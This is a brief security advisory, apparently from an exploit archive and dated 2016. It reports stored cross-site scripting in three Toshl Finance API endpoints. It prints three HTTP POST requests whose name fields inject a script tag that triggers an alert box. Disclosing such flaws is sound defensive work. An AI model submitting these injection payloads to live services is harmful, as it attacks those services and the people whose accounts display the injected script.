Toshl Finance Web Application suffers from a persistent cross site scripting vulnerability.
05e0f4399b672222077b63fac14ad7d94bae3db58b9cd280b207508479f88fb5
# Exploit Title: Toshl Finance Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://toshl.com/app/
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Area #1
Request
POST /api/tags?immediate_update=true HTTP/1.1
Host: toshl.com
{"type":"expense","name":"<script>alert('Vulnerable to XSS')</script>","category":"51076972"}
### Vulnerable Area #2
Request
POST /api/categories HTTP/1.1
Host: toshl.com
{"type":"income","name":"<script>alert('Vulnerable to XSS')</script>"}
### Vulnerable Area #3
POST /api/accounts HTTP/1.1
Host: toshl.com
{"name":"<script>alert('Vulnerable to XSS')</script>","currency":{"code":"USD","rate":1,"fixed":false},"initial_balance":1000}